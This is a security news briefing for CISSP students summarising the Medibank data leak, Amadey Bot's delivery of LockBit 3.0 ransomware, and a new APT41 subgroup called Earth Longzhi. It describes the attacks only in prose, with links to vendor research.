Les Bell

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Medibank Breach, Cont. . .

The Medibank saga continues to drag on; yesterday's posting of around 2.5 GB of data has been followed by more overnight. Yesterday's 'nice' list turned out to contain people who had received treatment for the usual conditions of old age, with the oldest being 105, while the 'naughty' list contained information about approximately 100 individuals who had undergone treatment for drug or alcohol abuse, or for mental health conditions. There has been at least one confirmation from an affected individual that the data is real.

The second upload seems to indicate that the cybercriminals involved are not interested in collecting individual ransoms, but are simply going to create as much damage as they can. We shall have much more to say on this and similar breaches. . .

Amadey Bot Distributes LockBit 3.0

The Amadey Bot infostealer and backdoor has been circulating since at least 2018, typically installing either GandCrab ransomware or the FlawedAmmyy remote access trojan. Now AhnLab Security Emergency Response Center reports that attackers are using it to install LockBit 3.0.

The Amadey Bot malware itself is being distributed in two ways: first via an infected Word file which downloads another file containing a malicious VBA macro, and second via a binary executable that carries the Word program icon.

For the first technique, if the user is duped into enabling content in Word, the VBA macros installs a malicious shortcut and then runs it, causing a PowerShell command to download and run Amadey Bot itself. The executable for the second technique masquerades as a file called Resume.exe (the default Windows behaviour of suppressing filetype extensions is a big problem here), which carries Amadey directly.

Once running, Amadey Bot connects to a C2 server, sends some system information and then waits for commands, which will usually download Lockbit as either a PowerShell script or as a binary. ASEC's analysis provides a description and IOC's.

Uncredited, LockBot 3.0 Being Distributed via Amadey Bot, blog post, 8 November 2022. Available online at https://asec.ahnlab.com/en/41450/.

New Branch of APT41 Targets Asia, Ukraine

Researchers at Trend Micro are reporting on a new subgroup of the Chinese state-supported APT41 (Double Dragon), which they have christened Earth Longzhi, and which is targeting government, defense, aviation, insurance and urban development industries in Taiwan, China, Thailand, Malaysia, Indonesia, Pakistan and Ukraine. APT41 divides its efforts between state-sponsored cyberespionage and financial crime for profit.

Earth Longzhi was initially identified in early 2022, but analysis of TTP's and code similarities suggest the group has been active since 2020. Their attacks start with a spear-phishing campaign, promising scandalous information about a person, to deliver their malware, either via a link or via a password-protected archive file. The first stage is a custom Cobalt Strike loader. Several generations of loaders have appeared; the first one was called Symatic Loader, and used a variety of antiforensics techniques.

The later campaign saw Earth Longzhi deploy several different customer loaders, which Trend Micro has christened CroxLoader, BigpipeLoader and OutLoader, and some of these have multiple variants, suggesting the group is actively developing their tools. Post-exploitation, they also use customized tools based on some open-source projects, such as a set of standalone binaries based on Mimikatz modules.

Hiroaki, Hara and Ted Lee, Hack the Real Box: APT41's New Subgroup Earth Longzhi, blog post, 9 November 2022. Available online at https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.